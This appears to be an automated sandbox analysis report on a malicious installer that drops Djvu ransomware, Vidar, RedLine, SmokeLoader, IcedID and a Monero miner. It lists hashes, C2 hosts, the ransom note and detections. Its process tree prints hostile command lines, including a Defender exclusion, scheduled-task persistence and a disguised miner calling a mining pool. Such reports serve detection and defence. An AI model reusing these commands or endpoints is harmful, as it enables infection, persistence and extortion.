Resubmissions

16-09-2021 20:34

210916-zcme3ahbgj 10

16-09-2021 14:08

210916-rfhmaadeg8 10

Analysis

  • max time kernel
    1803s
  • max time network
    1808s
  • platform
    windows7_x64
  • resource
    win7-ja-20210916
  • submitted
    16-09-2021 20:34

General

  • Target

    setup_x86_x64_install.exe

  • Size

    7.1MB

  • MD5

    7b15ff87e11bd9bc7512b41635b68aeb

  • SHA1

    3ddf56275a2132a384d251247f38cc086b6db914

  • SHA256

    f92cfeb06515f18113a950d5bd569a23cdd85514ef509ccff6c5a4e9a08ca4c7

  • SHA512

    d16b63a203a3322ec70f99a7ca692770c45710e2c0d50f24bf027d8d41d579d721e8cf5f20cc95436b1640b821b8efe1a3c617232cdc18c13be0e37431f7baab

Malware Config

Extracted

Path

C:\_readme.txt

Family

djvu

Ransom Note
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-CtDpAM1g5f Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0333gSd743dfRiXRqq62TeogIfmpihYZJ6wDmuUVD07WwczX6Bm
URLs

https://we.tl/t-CtDpAM1g5f

Extracted

Family

vidar

Version

40.6

Botnet

706

C2

https://dimonbk83.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

smokeloader

Version

2020

C2

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

medianew

C2

91.121.67.60:62102

Extracted

Family

redline

Botnet

ANI

C2

45.142.215.47:27643

Extracted

Family

icedid

Campaign

1721901314

Signatures

  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE Amadey CnC Check-In

    suricata: ET MALWARE Amadey CnC Check-In

  • suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

  • suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

    suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

  • suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent

    suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent

  • suricata: ET MALWARE Possible Kelihos.F EXE Download Common Structure

    suricata: ET MALWARE Possible Kelihos.F EXE Download Common Structure

  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

    suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

  • suricata: ET MALWARE Win32/IcedID Request Cookie

    suricata: ET MALWARE Win32/IcedID Request Cookie

  • suricata: ET MALWARE Win32/Tnega Activity (GET)

    suricata: ET MALWARE Win32/Tnega Activity (GET)

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • Modifies extensions of user files 5 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Sets file to hidden 1 TTPs

    Modifies file attributes to stop it showing in Explorer etc.

  • VMProtect packed file 4 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 10 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 34 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 8 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 6 IoCs
  • Kills process with taskkill 6 IoCs
  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 14 IoCs
  • Script User-Agent 8 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 9 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 37 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1112
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1128
      • C:\Users\Admin\AppData\Local\Temp\7zS864EC813\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS864EC813\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1892
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1784
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            5⤵
              PID:1416
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Thu115049bf2e.exe
            4⤵
            • Loads dropped DLL
            PID:948
            • C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu115049bf2e.exe
              Thu115049bf2e.exe
              5⤵
              • Executes dropped EXE
              • Modifies system certificate store
              • Suspicious use of AdjustPrivilegeToken
              PID:296
              • C:\Users\Admin\AppData\Roaming\6256900.scr
                "C:\Users\Admin\AppData\Roaming\6256900.scr" /S
                6⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:2808
                • C:\Windows\system32\WerFault.exe
                  C:\Windows\system32\WerFault.exe -u -p 2808 -s 1680
                  7⤵
                  • Program crash
                  • Suspicious behavior: GetForegroundWindowSpam
                  PID:2464
              • C:\Users\Admin\AppData\Roaming\2764123.scr
                "C:\Users\Admin\AppData\Roaming\2764123.scr" /S
                6⤵
                  PID:636
                • C:\Users\Admin\AppData\Roaming\4299185.scr
                  "C:\Users\Admin\AppData\Roaming\4299185.scr" /S
                  6⤵
                  • Executes dropped EXE
                  PID:1212
                • C:\Users\Admin\AppData\Roaming\5702169.scr
                  "C:\Users\Admin\AppData\Roaming\5702169.scr" /S
                  6⤵
                    PID:1560
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c Thu11b9fee5fd5b3c.exe
                4⤵
                • Loads dropped DLL
                PID:1600
                • C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu11b9fee5fd5b3c.exe
                  Thu11b9fee5fd5b3c.exe
                  5⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:2004
                  • C:\Users\Admin\AppData\Local\Temp\is-P1F05.tmp\Thu11b9fee5fd5b3c.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-P1F05.tmp\Thu11b9fee5fd5b3c.tmp" /SL5="$40136,138429,56832,C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu11b9fee5fd5b3c.exe"
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of FindShellTrayWindow
                    PID:760
                    • C:\Users\Admin\AppData\Local\Temp\is-E8ELU.tmp\Setup.exe
                      "C:\Users\Admin\AppData\Local\Temp\is-E8ELU.tmp\Setup.exe" /Verysilent
                      7⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:2068
                      • C:\Program Files (x86)\PDF Reader\PDF Reader\Setup.exe
                        "C:\Program Files (x86)\PDF Reader\PDF Reader\Setup.exe"
                        8⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2196
                        • C:\Users\Admin\AppData\Local\Temp\sampason12345.exe
                          "C:\Users\Admin\AppData\Local\Temp\sampason12345.exe"
                          9⤵
                          • Executes dropped EXE
                          PID:2540
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c Thu118764660749a3b.exe
                4⤵
                • Loads dropped DLL
                PID:1096
                • C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu118764660749a3b.exe
                  Thu118764660749a3b.exe
                  5⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Modifies system certificate store
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1040
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /c taskkill /f /im chrome.exe
                    6⤵
                      PID:3244
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /f /im chrome.exe
                        7⤵
                        • Kills process with taskkill
                        PID:3276
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c Thu117e9466431bbb9f.exe /mixone
                  4⤵
                  • Loads dropped DLL
                  PID:1100
                  • C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu117e9466431bbb9f.exe
                    Thu117e9466431bbb9f.exe /mixone
                    5⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:576
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c taskkill /im "Thu117e9466431bbb9f.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu117e9466431bbb9f.exe" & exit
                      6⤵
                        PID:2280
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /im "Thu117e9466431bbb9f.exe" /f
                          7⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2336
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c Thu116d4ab7efb7.exe
                    4⤵
                    • Loads dropped DLL
                    PID:1008
                    • C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu116d4ab7efb7.exe
                      Thu116d4ab7efb7.exe
                      5⤵
                      • Executes dropped EXE
                      PID:748
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c Thu11787d2b833e6.exe
                    4⤵
                    • Loads dropped DLL
                    PID:1640
                    • C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu11787d2b833e6.exe
                      Thu11787d2b833e6.exe
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: MapViewOfSection
                      PID:1736
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c Thu113e650b5e.exe
                    4⤵
                      PID:936
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c Thu112e5981b78.exe
                      4⤵
                        PID:1692
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c Thu1160e2804caf.exe
                        4⤵
                          PID:988
                          • C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu1160e2804caf.exe
                            Thu1160e2804caf.exe
                            5⤵
                            • Executes dropped EXE
                            • Modifies system certificate store
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1808
                            • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                              "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                              6⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:2832
                              • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                7⤵
                                • Executes dropped EXE
                                PID:3060
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                  8⤵
                                    PID:2912
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                      9⤵
                                      • Creates scheduled task(s)
                                      PID:3108
                                  • C:\Users\Admin\AppData\Roaming\services64.exe
                                    "C:\Users\Admin\AppData\Roaming\services64.exe"
                                    8⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    • Modifies system certificate store
                                    PID:4072
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                      9⤵
                                        PID:2872
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                          10⤵
                                          • Creates scheduled task(s)
                                          PID:3252
                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                        9⤵
                                          PID:1460
                                        • C:\Windows\explorer.exe
                                          C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                          9⤵
                                            PID:2416
                                      • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
                                        "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2264
                                        • C:\ProgramData\5623931.exe
                                          "C:\ProgramData\5623931.exe"
                                          8⤵
                                          • Executes dropped EXE
                                          PID:1796
                                          • C:\Windows\system32\WerFault.exe
                                            C:\Windows\system32\WerFault.exe -u -p 1796 -s 1652
                                            9⤵
                                            • Program crash
                                            • Suspicious behavior: GetForegroundWindowSpam
                                            PID:3024
                                        • C:\ProgramData\5476993.exe
                                          "C:\ProgramData\5476993.exe"
                                          8⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:1696
                                          • C:\ProgramData\5476993.exe
                                            "C:\ProgramData\5476993.exe"
                                            9⤵
                                            • Executes dropped EXE
                                            PID:3848
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1696 -s 808
                                            9⤵
                                            • Program crash
                                            • Suspicious behavior: GetForegroundWindowSpam
                                            PID:3284
                                        • C:\ProgramData\7910667.exe
                                          "C:\ProgramData\7910667.exe"
                                          8⤵
                                          • Executes dropped EXE
                                          • Checks BIOS information in registry
                                          • Checks whether UAC is enabled
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          PID:1308
                                      • C:\Users\Admin\AppData\Local\Temp\2.exe
                                        "C:\Users\Admin\AppData\Local\Temp\2.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        PID:836
                                        • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                          "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                          8⤵
                                            PID:2340
                                            • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                              "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                              9⤵
                                              • Modifies data under HKEY_USERS
                                              PID:1772
                                        • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                          "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:992
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit
                                            8⤵
                                              PID:2080
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /im "setup.exe" /f
                                                9⤵
                                                • Kills process with taskkill
                                                PID:3028
                                          • C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_v4.exe
                                            "C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_v4.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            PID:2644
                                          • C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecMa14.exe
                                            "C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecMa14.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            PID:2176
                                            • C:\Windows\system32\WerFault.exe
                                              C:\Windows\system32\WerFault.exe -u -p 2176 -s 800
                                              8⤵
                                              • Program crash
                                              • Suspicious behavior: GetForegroundWindowSpam
                                              PID:3724
                                          • C:\Users\Admin\AppData\Local\Temp\6.exe
                                            "C:\Users\Admin\AppData\Local\Temp\6.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2528
                                            • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                              "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                              8⤵
                                              • Executes dropped EXE
                                              PID:948
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c ""C:\Users\Admin\AppData\Roaming\new\FoxyIDM82\zelda3847.bat" "
                                                9⤵
                                                  PID:3292
                                                  • C:\Users\Admin\AppData\Roaming\new\FoxyIDM82\inst.exe
                                                    inst.exe
                                                    10⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    PID:3352
                                                    • C:\Users\Admin\AppData\Roaming\new\FoxyIDM82\inst.exe
                                                      inst.exe
                                                      11⤵
                                                      • Executes dropped EXE
                                                      PID:3392
                                                      • C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"
                                                        12⤵
                                                          PID:3540
                                                          • C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"
                                                            13⤵
                                                            • Executes dropped EXE
                                                            • Adds Run key to start application
                                                            PID:3576
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e0171c4c73\
                                                              14⤵
                                                                PID:3648
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e0171c4c73\
                                                                  15⤵
                                                                    PID:3764
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe" /F
                                                                  14⤵
                                                                  • Creates scheduled task(s)
                                                                  PID:3676
                                                                • C:\Users\Admin\AppData\Local\Temp\booster\booster.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\booster.\booster.exe"
                                                                  14⤵
                                                                  • Executes dropped EXE
                                                                  PID:3508
                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                    "C:\Windows\System32\WScript.exe" "C:\Terminal8427\hoders\kllk.vbs" /f=CREATE_NO_WINDOW install.cmd
                                                                    15⤵
                                                                      PID:1744
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd /c ""C:\Terminal8427\hoders\end.bat" "
                                                                        16⤵
                                                                          PID:3916
                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                            timeout 7
                                                                            17⤵
                                                                            • Delays execution with timeout.exe
                                                                            PID:3952
                                                                          • C:\Terminal8427\hoders\winfss.exe
                                                                            "winfss.exe" e -pfisiHihsd7s8ksd8 pom.rar
                                                                            17⤵
                                                                            • Executes dropped EXE
                                                                            PID:3244
                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                            timeout 6
                                                                            17⤵
                                                                            • Delays execution with timeout.exe
                                                                            PID:3408
                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                            timeout 8
                                                                            17⤵
                                                                            • Delays execution with timeout.exe
                                                                            PID:3768
                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                            "C:\Windows\System32\WScript.exe" "C:\Terminal8427\hoders\1q.vbs"
                                                                            17⤵
                                                                              PID:3704
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd /c ""C:\Terminal8427\hoders\shellst.bat" "
                                                                                18⤵
                                                                                  PID:2944
                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                    attrib +s +h "C:\Terminal8427"
                                                                                    19⤵
                                                                                    • Views/modifies file attributes
                                                                                    PID:3856
                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                    timeout 2
                                                                                    19⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    • Delays execution with timeout.exe
                                                                                    PID:3540
                                                                                  • C:\Terminal8427\hoders\kerclean.exe
                                                                                    kerclean.exe /start
                                                                                    19⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:288
                                                                                    • C:\Terminal8427\hoders\kerclean.exe
                                                                                      kerclean.exe /start
                                                                                      20⤵
                                                                                      • Executes dropped EXE
                                                                                      • Modifies system certificate store
                                                                                      PID:2152
                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                    taskkill /f /im winfss.exe
                                                                                    19⤵
                                                                                    • Kills process with taskkill
                                                                                    PID:3100
                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                    taskkill /f /im winfss.exe
                                                                                    19⤵
                                                                                    • Kills process with taskkill
                                                                                    PID:3584
                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                    attrib -s -h "C:\Terminal8427\hoders"
                                                                                    19⤵
                                                                                    • Views/modifies file attributes
                                                                                    PID:3768
                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                    timeout 4
                                                                                    19⤵
                                                                                    • Executes dropped EXE
                                                                                    • Delays execution with timeout.exe
                                                                                    PID:2952
                                                                • C:\Users\Admin\AppData\Roaming\new\FoxyIDM82\FoxyIDM82.exe
                                                                  FoxyIDM82.exe
                                                                  10⤵
                                                                  • Executes dropped EXE
                                                                  PID:3748
                                                                  • C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp
                                                                    "C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp" -d "C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\"
                                                                    11⤵
                                                                    • Executes dropped EXE
                                                                    • Drops file in Program Files directory
                                                                    PID:4008
                                                          • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                            7⤵
                                                            • Executes dropped EXE
                                                            PID:1112
                                                            • C:\Users\Admin\AppData\Local\Temp\is-9U4JL.tmp\setup_2.tmp
                                                              "C:\Users\Admin\AppData\Local\Temp\is-9U4JL.tmp\setup_2.tmp" /SL5="$401CE,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                              8⤵
                                                              • Executes dropped EXE
                                                              PID:964
                                                              • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                9⤵
                                                                • Executes dropped EXE
                                                                PID:2256
                                                                • C:\Users\Admin\AppData\Local\Temp\is-5BAB7.tmp\setup_2.tmp
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-5BAB7.tmp\setup_2.tmp" /SL5="$501CE,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                  10⤵
                                                                  • Executes dropped EXE
                                                                  • Drops file in Program Files directory
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  PID:2384
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-27CQN.tmp\postback.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-27CQN.tmp\postback.exe" ss1
                                                                    11⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:1572
                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                      explorer.exe ss1
                                                                      12⤵
                                                                        PID:3304
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\TbsPOk0cU.dll"
                                                                          13⤵
                                                                            PID:2736
                                                                            • C:\Windows\SysWOW64\regsvr32.exe
                                                                              regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\TbsPOk0cU.dll"
                                                                              14⤵
                                                                                PID:2584
                                                                                • C:\Windows\system32\regsvr32.exe
                                                                                  /s "C:\Users\Admin\AppData\Local\Temp\TbsPOk0cU.dll"
                                                                                  15⤵
                                                                                    PID:3720
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\TbsPOk0cU.dllRRKFdPhuU.dll"
                                                                                13⤵
                                                                                  PID:3944
                                                                                  • C:\Windows\SysWOW64\regsvr32.exe
                                                                                    regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\TbsPOk0cU.dllRRKFdPhuU.dll"
                                                                                    14⤵
                                                                                      PID:3100
                                                                      • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\3002.exe"
                                                                        7⤵
                                                                        • Executes dropped EXE
                                                                        PID:2908
                                                                        • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
                                                                          8⤵
                                                                            PID:2952
                                                                        • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          PID:2296
